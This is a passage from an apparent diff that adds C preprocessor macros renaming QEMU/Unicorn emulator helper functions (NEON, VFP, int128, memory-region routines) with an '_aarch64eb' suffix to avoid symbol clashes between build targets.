helper_neon_max_u8_aarch64eb +#define helper_neon_min_s16 helper_neon_min_s16_aarch64eb +#define helper_neon_min_s32 helper_neon_min_s32_aarch64eb +#define helper_neon_min_s8 helper_neon_min_s8_aarch64eb +#define helper_neon_min_u16 helper_neon_min_u16_aarch64eb +#define helper_neon_min_u32 helper_neon_min_u32_aarch64eb +#define helper_neon_min_u8 helper_neon_min_u8_aarch64eb +#define helper_neon_mull_p8 helper_neon_mull_p8_aarch64eb +#define helper_neon_mull_s16 helper_neon_mull_s16_aarch64eb +#define helper_neon_mull_s8 helper_neon_mull_s8_aarch64eb +#define helper_neon_mull_u16 helper_neon_mull_u16_aarch64eb +#define helper_neon_mull_u8 helper_neon_mull_u8_aarch64eb +#define helper_neon_mul_p8 helper_neon_mul_p8_aarch64eb +#define helper_neon_mul_u16 helper_neon_mul_u16_aarch64eb +#define helper_neon_mul_u8 helper_neon_mul_u8_aarch64eb +#define helper_neon_narrow_high_u16 helper_neon_narrow_high_u16_aarch64eb +#define helper_neon_narrow_high_u8 helper_neon_narrow_high_u8_aarch64eb +#define helper_neon_narrow_round_high_u16 helper_neon_narrow_round_high_u16_aarch64eb +#define helper_neon_narrow_round_high_u8 helper_neon_narrow_round_high_u8_aarch64eb +#define helper_neon_narrow_sat_s16 helper_neon_narrow_sat_s16_aarch64eb +#define helper_neon_narrow_sat_s32 helper_neon_narrow_sat_s32_aarch64eb +#define helper_neon_narrow_sat_s8 helper_neon_narrow_sat_s8_aarch64eb +#define helper_neon_narrow_sat_u16 helper_neon_narrow_sat_u16_aarch64eb +#define helper_neon_narrow_sat_u32 helper_neon_narrow_sat_u32_aarch64eb +#define helper_neon_narrow_sat_u8 helper_neon_narrow_sat_u8_aarch64eb +#define helper_neon_narrow_u16 helper_neon_narrow_u16_aarch64eb +#define helper_neon_narrow_u8 helper_neon_narrow_u8_aarch64eb +#define helper_neon_negl_u16 helper_neon_negl_u16_aarch64eb +#define helper_neon_negl_u32 helper_neon_negl_u32_aarch64eb +#define helper_neon_paddl_u16 helper_neon_paddl_u16_aarch64eb +#define helper_neon_paddl_u32 helper_neon_paddl_u32_aarch64eb +#define 
helper_neon_padd_u16 helper_neon_padd_u16_aarch64eb +#define helper_neon_padd_u8 helper_neon_padd_u8_aarch64eb +#define helper_neon_pmax_s16 helper_neon_pmax_s16_aarch64eb +#define helper_neon_pmax_s8 helper_neon_pmax_s8_aarch64eb +#define helper_neon_pmax_u16 helper_neon_pmax_u16_aarch64eb +#define helper_neon_pmax_u8 helper_neon_pmax_u8_aarch64eb +#define helper_neon_pmin_s16 helper_neon_pmin_s16_aarch64eb +#define helper_neon_pmin_s8 helper_neon_pmin_s8_aarch64eb +#define helper_neon_pmin_u16 helper_neon_pmin_u16_aarch64eb +#define helper_neon_pmin_u8 helper_neon_pmin_u8_aarch64eb +#define helper_neon_pmull_64_hi helper_neon_pmull_64_hi_aarch64eb +#define helper_neon_pmull_64_lo helper_neon_pmull_64_lo_aarch64eb +#define helper_neon_qabs_s16 helper_neon_qabs_s16_aarch64eb +#define helper_neon_qabs_s32 helper_neon_qabs_s32_aarch64eb +#define helper_neon_qabs_s64 helper_neon_qabs_s64_aarch64eb +#define helper_neon_qabs_s8 helper_neon_qabs_s8_aarch64eb +#define helper_neon_qadd_s16 helper_neon_qadd_s16_aarch64eb +#define helper_neon_qadd_s32 helper_neon_qadd_s32_aarch64eb +#define helper_neon_qadd_s64 helper_neon_qadd_s64_aarch64eb +#define helper_neon_qadd_s8 helper_neon_qadd_s8_aarch64eb +#define helper_neon_qadd_u16 helper_neon_qadd_u16_aarch64eb +#define helper_neon_qadd_u32 helper_neon_qadd_u32_aarch64eb +#define helper_neon_qadd_u64 helper_neon_qadd_u64_aarch64eb +#define helper_neon_qadd_u8 helper_neon_qadd_u8_aarch64eb +#define helper_neon_qdmulh_s16 helper_neon_qdmulh_s16_aarch64eb +#define helper_neon_qdmulh_s32 helper_neon_qdmulh_s32_aarch64eb +#define helper_neon_qneg_s16 helper_neon_qneg_s16_aarch64eb +#define helper_neon_qneg_s32 helper_neon_qneg_s32_aarch64eb +#define helper_neon_qneg_s64 helper_neon_qneg_s64_aarch64eb +#define helper_neon_qneg_s8 helper_neon_qneg_s8_aarch64eb +#define helper_neon_qrdmulh_s16 helper_neon_qrdmulh_s16_aarch64eb +#define helper_neon_qrdmulh_s32 helper_neon_qrdmulh_s32_aarch64eb +#define helper_neon_qrshl_s16 
helper_neon_qrshl_s16_aarch64eb +#define helper_neon_qrshl_s32 helper_neon_qrshl_s32_aarch64eb +#define helper_neon_qrshl_s64 helper_neon_qrshl_s64_aarch64eb +#define helper_neon_qrshl_s8 helper_neon_qrshl_s8_aarch64eb +#define helper_neon_qrshl_u16 helper_neon_qrshl_u16_aarch64eb +#define helper_neon_qrshl_u32 helper_neon_qrshl_u32_aarch64eb +#define helper_neon_qrshl_u64 helper_neon_qrshl_u64_aarch64eb +#define helper_neon_qrshl_u8 helper_neon_qrshl_u8_aarch64eb +#define helper_neon_qshl_s16 helper_neon_qshl_s16_aarch64eb +#define helper_neon_qshl_s32 helper_neon_qshl_s32_aarch64eb +#define helper_neon_qshl_s64 helper_neon_qshl_s64_aarch64eb +#define helper_neon_qshl_s8 helper_neon_qshl_s8_aarch64eb +#define helper_neon_qshl_u16 helper_neon_qshl_u16_aarch64eb +#define helper_neon_qshl_u32 helper_neon_qshl_u32_aarch64eb +#define helper_neon_qshl_u64 helper_neon_qshl_u64_aarch64eb +#define helper_neon_qshl_u8 helper_neon_qshl_u8_aarch64eb +#define helper_neon_qshlu_s16 helper_neon_qshlu_s16_aarch64eb +#define helper_neon_qshlu_s32 helper_neon_qshlu_s32_aarch64eb +#define helper_neon_qshlu_s64 helper_neon_qshlu_s64_aarch64eb +#define helper_neon_qshlu_s8 helper_neon_qshlu_s8_aarch64eb +#define helper_neon_qsub_s16 helper_neon_qsub_s16_aarch64eb +#define helper_neon_qsub_s32 helper_neon_qsub_s32_aarch64eb +#define helper_neon_qsub_s64 helper_neon_qsub_s64_aarch64eb +#define helper_neon_qsub_s8 helper_neon_qsub_s8_aarch64eb +#define helper_neon_qsub_u16 helper_neon_qsub_u16_aarch64eb +#define helper_neon_qsub_u32 helper_neon_qsub_u32_aarch64eb +#define helper_neon_qsub_u64 helper_neon_qsub_u64_aarch64eb +#define helper_neon_qsub_u8 helper_neon_qsub_u8_aarch64eb +#define helper_neon_qunzip16 helper_neon_qunzip16_aarch64eb +#define helper_neon_qunzip32 helper_neon_qunzip32_aarch64eb +#define helper_neon_qunzip8 helper_neon_qunzip8_aarch64eb +#define helper_neon_qzip16 helper_neon_qzip16_aarch64eb +#define helper_neon_qzip32 helper_neon_qzip32_aarch64eb +#define 
helper_neon_qzip8 helper_neon_qzip8_aarch64eb +#define helper_neon_rbit_u8 helper_neon_rbit_u8_aarch64eb +#define helper_neon_rhadd_s16 helper_neon_rhadd_s16_aarch64eb +#define helper_neon_rhadd_s32 helper_neon_rhadd_s32_aarch64eb +#define helper_neon_rhadd_s8 helper_neon_rhadd_s8_aarch64eb +#define helper_neon_rhadd_u16 helper_neon_rhadd_u16_aarch64eb +#define helper_neon_rhadd_u32 helper_neon_rhadd_u32_aarch64eb +#define helper_neon_rhadd_u8 helper_neon_rhadd_u8_aarch64eb +#define helper_neon_rshl_s16 helper_neon_rshl_s16_aarch64eb +#define helper_neon_rshl_s32 helper_neon_rshl_s32_aarch64eb +#define helper_neon_rshl_s64 helper_neon_rshl_s64_aarch64eb +#define helper_neon_rshl_s8 helper_neon_rshl_s8_aarch64eb +#define helper_neon_rshl_u16 helper_neon_rshl_u16_aarch64eb +#define helper_neon_rshl_u32 helper_neon_rshl_u32_aarch64eb +#define helper_neon_rshl_u64 helper_neon_rshl_u64_aarch64eb +#define helper_neon_rshl_u8 helper_neon_rshl_u8_aarch64eb +#define helper_neon_shl_s16 helper_neon_shl_s16_aarch64eb +#define helper_neon_shl_s32 helper_neon_shl_s32_aarch64eb +#define helper_neon_shl_s64 helper_neon_shl_s64_aarch64eb +#define helper_neon_shl_s8 helper_neon_shl_s8_aarch64eb +#define helper_neon_shl_u16 helper_neon_shl_u16_aarch64eb +#define helper_neon_shl_u32 helper_neon_shl_u32_aarch64eb +#define helper_neon_shl_u64 helper_neon_shl_u64_aarch64eb +#define helper_neon_shl_u8 helper_neon_shl_u8_aarch64eb +#define helper_neon_sqadd_u16 helper_neon_sqadd_u16_aarch64eb +#define helper_neon_sqadd_u32 helper_neon_sqadd_u32_aarch64eb +#define helper_neon_sqadd_u64 helper_neon_sqadd_u64_aarch64eb +#define helper_neon_sqadd_u8 helper_neon_sqadd_u8_aarch64eb +#define helper_neon_subl_u16 helper_neon_subl_u16_aarch64eb +#define helper_neon_subl_u32 helper_neon_subl_u32_aarch64eb +#define helper_neon_sub_u16 helper_neon_sub_u16_aarch64eb +#define helper_neon_sub_u8 helper_neon_sub_u8_aarch64eb +#define helper_neon_tbl helper_neon_tbl_aarch64eb +#define helper_neon_tst_u16 
helper_neon_tst_u16_aarch64eb +#define helper_neon_tst_u32 helper_neon_tst_u32_aarch64eb +#define helper_neon_tst_u8 helper_neon_tst_u8_aarch64eb +#define helper_neon_unarrow_sat16 helper_neon_unarrow_sat16_aarch64eb +#define helper_neon_unarrow_sat32 helper_neon_unarrow_sat32_aarch64eb +#define helper_neon_unarrow_sat8 helper_neon_unarrow_sat8_aarch64eb +#define helper_neon_unzip16 helper_neon_unzip16_aarch64eb +#define helper_neon_unzip8 helper_neon_unzip8_aarch64eb +#define helper_neon_uqadd_s16 helper_neon_uqadd_s16_aarch64eb +#define helper_neon_uqadd_s32 helper_neon_uqadd_s32_aarch64eb +#define helper_neon_uqadd_s64 helper_neon_uqadd_s64_aarch64eb +#define helper_neon_uqadd_s8 helper_neon_uqadd_s8_aarch64eb +#define helper_neon_widen_s16 helper_neon_widen_s16_aarch64eb +#define helper_neon_widen_s8 helper_neon_widen_s8_aarch64eb +#define helper_neon_widen_u16 helper_neon_widen_u16_aarch64eb +#define helper_neon_widen_u8 helper_neon_widen_u8_aarch64eb +#define helper_neon_zip16 helper_neon_zip16_aarch64eb +#define helper_neon_zip8 helper_neon_zip8_aarch64eb +#define helper_pre_hvc helper_pre_hvc_aarch64eb +#define helper_pre_smc helper_pre_smc_aarch64eb +#define helper_qadd16 helper_qadd16_aarch64eb +#define helper_qadd8 helper_qadd8_aarch64eb +#define helper_qaddsubx helper_qaddsubx_aarch64eb +#define helper_qsub16 helper_qsub16_aarch64eb +#define helper_qsub8 helper_qsub8_aarch64eb +#define helper_qsubaddx helper_qsubaddx_aarch64eb +#define helper_rbit helper_rbit_aarch64eb +#define helper_recpe_f32 helper_recpe_f32_aarch64eb +#define helper_recpe_f64 helper_recpe_f64_aarch64eb +#define helper_recpe_u32 helper_recpe_u32_aarch64eb +#define helper_recps_f32 helper_recps_f32_aarch64eb +#define helper_ret_ldb_cmmu helper_ret_ldb_cmmu_aarch64eb +#define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_aarch64eb +#define helper_ret_ldub_mmu helper_ret_ldub_mmu_aarch64eb +#define helper_ret_stb_mmu helper_ret_stb_mmu_aarch64eb +#define helper_rintd helper_rintd_aarch64eb 
+#define helper_rintd_exact helper_rintd_exact_aarch64eb +#define helper_rints helper_rints_aarch64eb +#define helper_rints_exact helper_rints_exact_aarch64eb +#define helper_ror_cc helper_ror_cc_aarch64eb +#define helper_rsqrte_f32 helper_rsqrte_f32_aarch64eb +#define helper_rsqrte_f64 helper_rsqrte_f64_aarch64eb +#define helper_rsqrte_u32 helper_rsqrte_u32_aarch64eb +#define helper_rsqrts_f32 helper_rsqrts_f32_aarch64eb +#define helper_sadd16 helper_sadd16_aarch64eb +#define helper_sadd8 helper_sadd8_aarch64eb +#define helper_saddsubx helper_saddsubx_aarch64eb +#define helper_sar_cc helper_sar_cc_aarch64eb +#define helper_sdiv helper_sdiv_aarch64eb +#define helper_sel_flags helper_sel_flags_aarch64eb +#define helper_set_cp_reg helper_set_cp_reg_aarch64eb +#define helper_set_cp_reg64 helper_set_cp_reg64_aarch64eb +#define helper_set_neon_rmode helper_set_neon_rmode_aarch64eb +#define helper_set_r13_banked helper_set_r13_banked_aarch64eb +#define helper_set_rmode helper_set_rmode_aarch64eb +#define helper_set_user_reg helper_set_user_reg_aarch64eb +#define helper_shadd16 helper_shadd16_aarch64eb +#define helper_shadd8 helper_shadd8_aarch64eb +#define helper_shaddsubx helper_shaddsubx_aarch64eb +#define helper_shl_cc helper_shl_cc_aarch64eb +#define helper_shr_cc helper_shr_cc_aarch64eb +#define helper_shsub16 helper_shsub16_aarch64eb +#define helper_shsub8 helper_shsub8_aarch64eb +#define helper_shsubaddx helper_shsubaddx_aarch64eb +#define helper_ssat helper_ssat_aarch64eb +#define helper_ssat16 helper_ssat16_aarch64eb +#define helper_ssub16 helper_ssub16_aarch64eb +#define helper_ssub8 helper_ssub8_aarch64eb +#define helper_ssubaddx helper_ssubaddx_aarch64eb +#define helper_stb_mmu helper_stb_mmu_aarch64eb +#define helper_stl_mmu helper_stl_mmu_aarch64eb +#define helper_stq_mmu helper_stq_mmu_aarch64eb +#define helper_stw_mmu helper_stw_mmu_aarch64eb +#define helper_sub_saturate helper_sub_saturate_aarch64eb +#define helper_sub_usaturate 
helper_sub_usaturate_aarch64eb +#define helper_sxtb16 helper_sxtb16_aarch64eb +#define helper_uadd16 helper_uadd16_aarch64eb +#define helper_uadd8 helper_uadd8_aarch64eb +#define helper_uaddsubx helper_uaddsubx_aarch64eb +#define helper_udiv helper_udiv_aarch64eb +#define helper_uhadd16 helper_uhadd16_aarch64eb +#define helper_uhadd8 helper_uhadd8_aarch64eb +#define helper_uhaddsubx helper_uhaddsubx_aarch64eb +#define helper_uhsub16 helper_uhsub16_aarch64eb +#define helper_uhsub8 helper_uhsub8_aarch64eb +#define helper_uhsubaddx helper_uhsubaddx_aarch64eb +#define helper_uqadd16 helper_uqadd16_aarch64eb +#define helper_uqadd8 helper_uqadd8_aarch64eb +#define helper_uqaddsubx helper_uqaddsubx_aarch64eb +#define helper_uqsub16 helper_uqsub16_aarch64eb +#define helper_uqsub8 helper_uqsub8_aarch64eb +#define helper_uqsubaddx helper_uqsubaddx_aarch64eb +#define helper_usad8 helper_usad8_aarch64eb +#define helper_usat helper_usat_aarch64eb +#define helper_usat16 helper_usat16_aarch64eb +#define helper_usub16 helper_usub16_aarch64eb +#define helper_usub8 helper_usub8_aarch64eb +#define helper_usubaddx helper_usubaddx_aarch64eb +#define helper_uxtb16 helper_uxtb16_aarch64eb +#define helper_v7m_mrs helper_v7m_mrs_aarch64eb +#define helper_v7m_msr helper_v7m_msr_aarch64eb +#define helper_vfp_absd helper_vfp_absd_aarch64eb +#define helper_vfp_abss helper_vfp_abss_aarch64eb +#define helper_vfp_addd helper_vfp_addd_aarch64eb +#define helper_vfp_adds helper_vfp_adds_aarch64eb +#define helper_vfp_cmpd helper_vfp_cmpd_aarch64eb +#define helper_vfp_cmped helper_vfp_cmped_aarch64eb +#define helper_vfp_cmpes helper_vfp_cmpes_aarch64eb +#define helper_vfp_cmps helper_vfp_cmps_aarch64eb +#define helper_vfp_divd helper_vfp_divd_aarch64eb +#define helper_vfp_divs helper_vfp_divs_aarch64eb +#define helper_vfp_fcvtds helper_vfp_fcvtds_aarch64eb +#define helper_vfp_fcvt_f16_to_f32 helper_vfp_fcvt_f16_to_f32_aarch64eb +#define helper_vfp_fcvt_f16_to_f64 helper_vfp_fcvt_f16_to_f64_aarch64eb 
+#define helper_vfp_fcvt_f32_to_f16 helper_vfp_fcvt_f32_to_f16_aarch64eb +#define helper_vfp_fcvt_f64_to_f16 helper_vfp_fcvt_f64_to_f16_aarch64eb +#define helper_vfp_fcvtsd helper_vfp_fcvtsd_aarch64eb +#define helper_vfp_get_fpscr helper_vfp_get_fpscr_aarch64eb +#define helper_vfp_maxd helper_vfp_maxd_aarch64eb +#define helper_vfp_maxnumd helper_vfp_maxnumd_aarch64eb +#define helper_vfp_maxnums helper_vfp_maxnums_aarch64eb +#define helper_vfp_maxs helper_vfp_maxs_aarch64eb +#define helper_vfp_mind helper_vfp_mind_aarch64eb +#define helper_vfp_minnumd helper_vfp_minnumd_aarch64eb +#define helper_vfp_minnums helper_vfp_minnums_aarch64eb +#define helper_vfp_mins helper_vfp_mins_aarch64eb +#define helper_vfp_muladdd helper_vfp_muladdd_aarch64eb +#define helper_vfp_muladds helper_vfp_muladds_aarch64eb +#define helper_vfp_muld helper_vfp_muld_aarch64eb +#define helper_vfp_muls helper_vfp_muls_aarch64eb +#define helper_vfp_negd helper_vfp_negd_aarch64eb +#define helper_vfp_negs helper_vfp_negs_aarch64eb +#define helper_vfp_set_fpscr helper_vfp_set_fpscr_aarch64eb +#define helper_vfp_shtod helper_vfp_shtod_aarch64eb +#define helper_vfp_shtos helper_vfp_shtos_aarch64eb +#define helper_vfp_sitod helper_vfp_sitod_aarch64eb +#define helper_vfp_sitos helper_vfp_sitos_aarch64eb +#define helper_vfp_sltod helper_vfp_sltod_aarch64eb +#define helper_vfp_sltos helper_vfp_sltos_aarch64eb +#define helper_vfp_sqrtd helper_vfp_sqrtd_aarch64eb +#define helper_vfp_sqrts helper_vfp_sqrts_aarch64eb +#define helper_vfp_sqtod helper_vfp_sqtod_aarch64eb +#define helper_vfp_sqtos helper_vfp_sqtos_aarch64eb +#define helper_vfp_subd helper_vfp_subd_aarch64eb +#define helper_vfp_subs helper_vfp_subs_aarch64eb +#define helper_vfp_toshd helper_vfp_toshd_aarch64eb +#define helper_vfp_toshd_round_to_zero helper_vfp_toshd_round_to_zero_aarch64eb +#define helper_vfp_toshs helper_vfp_toshs_aarch64eb +#define helper_vfp_toshs_round_to_zero helper_vfp_toshs_round_to_zero_aarch64eb +#define helper_vfp_tosid 
helper_vfp_tosid_aarch64eb +#define helper_vfp_tosis helper_vfp_tosis_aarch64eb +#define helper_vfp_tosizd helper_vfp_tosizd_aarch64eb +#define helper_vfp_tosizs helper_vfp_tosizs_aarch64eb +#define helper_vfp_tosld helper_vfp_tosld_aarch64eb +#define helper_vfp_tosld_round_to_zero helper_vfp_tosld_round_to_zero_aarch64eb +#define helper_vfp_tosls helper_vfp_tosls_aarch64eb +#define helper_vfp_tosls_round_to_zero helper_vfp_tosls_round_to_zero_aarch64eb +#define helper_vfp_tosqd helper_vfp_tosqd_aarch64eb +#define helper_vfp_tosqs helper_vfp_tosqs_aarch64eb +#define helper_vfp_touhd helper_vfp_touhd_aarch64eb +#define helper_vfp_touhd_round_to_zero helper_vfp_touhd_round_to_zero_aarch64eb +#define helper_vfp_touhs helper_vfp_touhs_aarch64eb +#define helper_vfp_touhs_round_to_zero helper_vfp_touhs_round_to_zero_aarch64eb +#define helper_vfp_touid helper_vfp_touid_aarch64eb +#define helper_vfp_touis helper_vfp_touis_aarch64eb +#define helper_vfp_touizd helper_vfp_touizd_aarch64eb +#define helper_vfp_touizs helper_vfp_touizs_aarch64eb +#define helper_vfp_tould helper_vfp_tould_aarch64eb +#define helper_vfp_tould_round_to_zero helper_vfp_tould_round_to_zero_aarch64eb +#define helper_vfp_touls helper_vfp_touls_aarch64eb +#define helper_vfp_touls_round_to_zero helper_vfp_touls_round_to_zero_aarch64eb +#define helper_vfp_touqd helper_vfp_touqd_aarch64eb +#define helper_vfp_touqs helper_vfp_touqs_aarch64eb +#define helper_vfp_uhtod helper_vfp_uhtod_aarch64eb +#define helper_vfp_uhtos helper_vfp_uhtos_aarch64eb +#define helper_vfp_uitod helper_vfp_uitod_aarch64eb +#define helper_vfp_uitos helper_vfp_uitos_aarch64eb +#define helper_vfp_ultod helper_vfp_ultod_aarch64eb +#define helper_vfp_ultos helper_vfp_ultos_aarch64eb +#define helper_vfp_uqtod helper_vfp_uqtod_aarch64eb +#define helper_vfp_uqtos helper_vfp_uqtos_aarch64eb +#define helper_wfe helper_wfe_aarch64eb +#define helper_wfi helper_wfi_aarch64eb +#define hex2decimal hex2decimal_aarch64eb +#define 
hw_breakpoint_update hw_breakpoint_update_aarch64eb +#define hw_breakpoint_update_all hw_breakpoint_update_all_aarch64eb +#define hw_watchpoint_update hw_watchpoint_update_aarch64eb +#define hw_watchpoint_update_all hw_watchpoint_update_all_aarch64eb +#define _init _init_aarch64eb +#define init_cpreg_list init_cpreg_list_aarch64eb +#define init_lists init_lists_aarch64eb +#define input_type_enum input_type_enum_aarch64eb +#define int128_2_64 int128_2_64_aarch64eb +#define int128_add int128_add_aarch64eb +#define int128_addto int128_addto_aarch64eb +#define int128_and int128_and_aarch64eb +#define int128_eq int128_eq_aarch64eb +#define int128_ge int128_ge_aarch64eb +#define int128_get64 int128_get64_aarch64eb +#define int128_gt int128_gt_aarch64eb +#define int128_le int128_le_aarch64eb +#define int128_lt int128_lt_aarch64eb +#define int128_make64 int128_make64_aarch64eb +#define int128_max int128_max_aarch64eb +#define int128_min int128_min_aarch64eb +#define int128_ne int128_ne_aarch64eb +#define int128_neg int128_neg_aarch64eb +#define int128_nz int128_nz_aarch64eb +#define int128_rshift int128_rshift_aarch64eb +#define int128_sub int128_sub_aarch64eb +#define int128_subfrom int128_subfrom_aarch64eb +#define int128_zero int128_zero_aarch64eb +#define int16_to_float32 int16_to_float32_aarch64eb +#define int16_to_float64 int16_to_float64_aarch64eb +#define int32_to_float128 int32_to_float128_aarch64eb +#define int32_to_float32 int32_to_float32_aarch64eb +#define int32_to_float64 int32_to_float64_aarch64eb +#define int32_to_floatx80 int32_to_floatx80_aarch64eb +#define int64_to_float128 int64_to_float128_aarch64eb +#define int64_to_float32 int64_to_float32_aarch64eb +#define int64_to_float64 int64_to_float64_aarch64eb +#define int64_to_floatx80 int64_to_floatx80_aarch64eb +#define invalidate_and_set_dirty invalidate_and_set_dirty_aarch64eb +#define invalidate_page_bitmap invalidate_page_bitmap_aarch64eb +#define io_mem_read io_mem_read_aarch64eb +#define io_mem_write 
io_mem_write_aarch64eb +#define io_readb io_readb_aarch64eb +#define io_readl io_readl_aarch64eb +#define io_readq io_readq_aarch64eb +#define io_readw io_readw_aarch64eb +#define iotlb_to_region iotlb_to_region_aarch64eb +#define io_writeb io_writeb_aarch64eb +#define io_writel io_writel_aarch64eb +#define io_writeq io_writeq_aarch64eb +#define io_writew io_writew_aarch64eb +#define is_a64 is_a64_aarch64eb +#define is_help_option is_help_option_aarch64eb +#define isr_read isr_read_aarch64eb +#define is_valid_option_list is_valid_option_list_aarch64eb +#define iwmmxt_load_creg iwmmxt_load_creg_aarch64eb +#define iwmmxt_load_reg iwmmxt_load_reg_aarch64eb +#define iwmmxt_store_creg iwmmxt_store_creg_aarch64eb +#define iwmmxt_store_reg iwmmxt_store_reg_aarch64eb +#define __jit_debug_descriptor __jit_debug_descriptor_aarch64eb +#define __jit_debug_register_code __jit_debug_register_code_aarch64eb +#define kvm_to_cpreg_id kvm_to_cpreg_id_aarch64eb +#define last_ram_offset last_ram_offset_aarch64eb +#define ldl_be_p ldl_be_p_aarch64eb +#define ldl_be_phys ldl_be_phys_aarch64eb +#define ldl_he_p ldl_he_p_aarch64eb +#define ldl_le_p ldl_le_p_aarch64eb +#define ldl_le_phys ldl_le_phys_aarch64eb +#define ldl_phys ldl_phys_aarch64eb +#define ldl_phys_internal ldl_phys_internal_aarch64eb +#define ldq_be_p ldq_be_p_aarch64eb +#define ldq_be_phys ldq_be_phys_aarch64eb +#define ldq_he_p ldq_he_p_aarch64eb +#define ldq_le_p ldq_le_p_aarch64eb +#define ldq_le_phys ldq_le_phys_aarch64eb +#define ldq_phys ldq_phys_aarch64eb +#define ldq_phys_internal ldq_phys_internal_aarch64eb +#define ldst_name ldst_name_aarch64eb +#define ldub_p ldub_p_aarch64eb +#define ldub_phys ldub_phys_aarch64eb +#define lduw_be_p lduw_be_p_aarch64eb +#define lduw_be_phys lduw_be_phys_aarch64eb +#define lduw_he_p lduw_he_p_aarch64eb +#define lduw_le_p lduw_le_p_aarch64eb +#define lduw_le_phys lduw_le_phys_aarch64eb +#define lduw_phys lduw_phys_aarch64eb +#define lduw_phys_internal lduw_phys_internal_aarch64eb 
+#define le128 le128_aarch64eb +#define linked_bp_matches linked_bp_matches_aarch64eb +#define listener_add_address_space listener_add_address_space_aarch64eb +#define load_cpu_offset load_cpu_offset_aarch64eb +#define load_reg load_reg_aarch64eb +#define load_reg_var load_reg_var_aarch64eb +#define log_cpu_state log_cpu_state_aarch64eb +#define lpae_cp_reginfo lpae_cp_reginfo_aarch64eb +#define lt128 lt128_aarch64eb +#define machine_class_init machine_class_init_aarch64eb +#define machine_finalize machine_finalize_aarch64eb +#define machine_info machine_info_aarch64eb +#define machine_initfn machine_initfn_aarch64eb +#define machine_register_types machine_register_types_aarch64eb +#define machvirt_init machvirt_init_aarch64eb +#define machvirt_machine_init machvirt_machine_init_aarch64eb +#define maj maj_aarch64eb +#define mapping_conflict mapping_conflict_aarch64eb +#define mapping_contiguous mapping_contiguous_aarch64eb +#define mapping_have_same_region mapping_have_same_region_aarch64eb +#define mapping_merge mapping_merge_aarch64eb +#define mem_add mem_add_aarch64eb +#define mem_begin mem_begin_aarch64eb +#define mem_commit mem_commit_aarch64eb +#define memory_access_is_direct memory_access_is_direct_aarch64eb +#define memory_access_size memory_access_size_aarch64eb +#define memory_init memory_init_aarch64eb +#define memory_listener_match memory_listener_match_aarch64eb +#define memory_listener_register memory_listener_register_aarch64eb +#define memory_listener_unregister memory_listener_unregister_aarch64eb +#define memory_map_init memory_map_init_aarch64eb +#define memory_mapping_filter memory_mapping_filter_aarch64eb +#define memory_mapping_list_add_mapping_sorted memory_mapping_list_add_mapping_sorted_aarch64eb +#define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_aarch64eb +#define memory_mapping_list_free memory_mapping_list_free_aarch64eb +#define memory_mapping_list_init memory_mapping_list_init_aarch64eb +#define 
memory_region_access_valid memory_region_access_valid_aarch64eb +#define memory_region_add_subregion memory_region_add_subregion_aarch64eb +#define memory_region_add_subregion_common memory_region_add_subregion_common_aarch64eb +#define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_aarch64eb +#define memory_region_big_endian memory_region_big_endian_aarch64eb +#define memory_region_clear_pending memory_region_clear_pending_aarch64eb +#define memory_region_del_subregion memory_region_del_subregion_aarch64eb +#define memory_region_destructor_alias memory_region_destructor_alias_aarch64eb +#define memory_region_destructor_none memory_region_destructor_none_aarch64eb +#define memory_region_destructor_ram memory_region_destructor_ram_aarch64eb +#define memory_region_destructor_ram_from_ptr memory_region_destructor_ram_from_ptr_aarch64eb +#define memory_region_dispatch_read memory_region_dispatch_read_aarch64eb +#define memory_region_dispatch_read1 memory_region_dispatch_read1_aarch64eb +#define memory_region_dispatch_write memory_region_dispatch_write_aarch64eb +#define memory_region_escape_name memory_region_escape_name_aarch64eb +#define memory_region_finalize memory_region_finalize_aarch64eb +#define memory_region_find memory_region_find_aarch64eb +#define memory_region_get_addr memory_region_get_addr_aarch64eb +#define memory_region_get_alignment memory_region_get_alignment_aarch64eb +#define memory_region_get_container memory_region_get_container_aarch64eb +#define memory_region_get_fd memory_region_get_fd_aarch64eb +#define memory_region_get_may_overlap memory_region_get_may_overlap_aarch64eb +#define memory_region_get_priority memory_region_get_priority_aarch64eb +#define memory_region_get_ram_addr memory_region_get_ram_addr_aarch64eb +#define memory_region_get_ram_ptr memory_region_get_ram_ptr_aarch64eb +#define memory_region_get_size memory_region_get_size_aarch64eb +#define memory_region_info memory_region_info_aarch64eb +#define 
memory_region_init memory_region_init_aarch64eb +#define memory_region_init_alias memory_region_init_alias_aarch64eb +#define memory_region_initfn memory_region_initfn_aarch64eb +#define memory_region_init_io memory_region_init_io_aarch64eb +#define memory_region_init_ram memory_region_init_ram_aarch64eb +#define memory_region_init_ram_ptr memory_region_init_ram_ptr_aarch64eb +#define memory_region_init_reservation memory_region_init_reservation_aarch64eb +#define memory_region_is_iommu memory_region_is_iommu_aarch64eb +#define memory_region_is_logging memory_region_is_logging_aarch64eb +#define memory_region_is_mapped memory_region_is_mapped_aarch64eb +#define memory_region_is_ram memory_region_is_ram_aarch64eb +#define memory_region_is_rom memory_region_is_rom_aarch64eb +#define memory_region_is_romd memory_region_is_romd_aarch64eb +#define memory_region_is_skip_dump memory_region_is_skip_dump_aarch64eb +#define memory_region_is_unassigned memory_region_is_unassigned_aarch64eb +#define memory_region_name memory_region_name_aarch64eb +#define memory_region_need_escape memory_region_need_escape_aarch64eb +#define memory_region_oldmmio_read_accessor memory_region_oldmmio_read_accessor_aarch64eb +#define memory_region_oldmmio_write_accessor memory_region_oldmmio_write_accessor_aarch64eb +#define memory_region_present memory_region_present_aarch64eb +#define memory_region_read_accessor memory_region_read_accessor_aarch64eb +#define memory_region_readd_subregion memory_region_readd_subregion_aarch64eb +#define memory_region_ref memory_region_ref_aarch64eb +#define memory_region_resolve_container memory_region_resolve_container_aarch64eb +#define memory_region_rom_device_set_romd memory_region_rom_device_set_romd_aarch64eb +#define memory_region_section_get_iotlb memory_region_section_get_iotlb_aarch64eb +#define memory_region_set_address memory_region_set_address_aarch64eb +#define memory_region_set_alias_offset memory_region_set_alias_offset_aarch64eb +#define 
